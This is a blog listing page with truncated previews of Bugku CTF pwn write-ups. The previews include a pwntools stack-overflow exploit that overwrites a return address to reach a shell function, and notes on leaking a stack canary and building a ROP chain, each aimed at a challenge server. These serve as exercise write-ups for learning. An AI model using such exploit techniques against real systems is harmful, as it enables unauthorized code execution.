Bugku CTF
Y-peak
一个努力的小白pwn
展开
-
[Bugku CTF——Pwn] pwn2
[Bugku CTF——Pwn] pwn2题目地址:https://ctf.bugku.com/额,好久不写这么简单的题目了利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出exploitfrom pwn import *p = remote('114.67.246.176',11431)get_shell = 0x0000000000400751payload = 'a' * (0x30 + 8) + p64(get_shell)p.send(payload)p.inter原创 2021-03-22 16:54:07 · 342 阅读 · 0 评论 -
[Bugku CTF——Pwn] pwn4
[Bugku CTF——Pwn] pwn4题目地址:https://ctf.bugku.com/给的提示很清楚,绕过canary保护那就绕过就好题目当中有system函数利用ROPgadget就好思路将canary低位的 ‘\x00’ 给覆盖掉, 就可以利用 %s 将其输出, leek出来exploitfrom pwn import *#p = process('./pwn4_')p = remote('114.67.246.176',15541)pop_rdi = 0x00原创 2021-03-22 16:44:14 · 577 阅读 · 0 评论 -
[Bugku CTF——Pwn] pwn1
[Bugku CTF——Pwn] pwn1题目地址:https://ctf.bugku.com/额, 直接nc连接上,就可以直接得到shell好水哦,新手玩玩就好,老鸟勿喷无语凝噎cat flag就好原创 2021-03-22 16:37:59 · 274 阅读 · 0 评论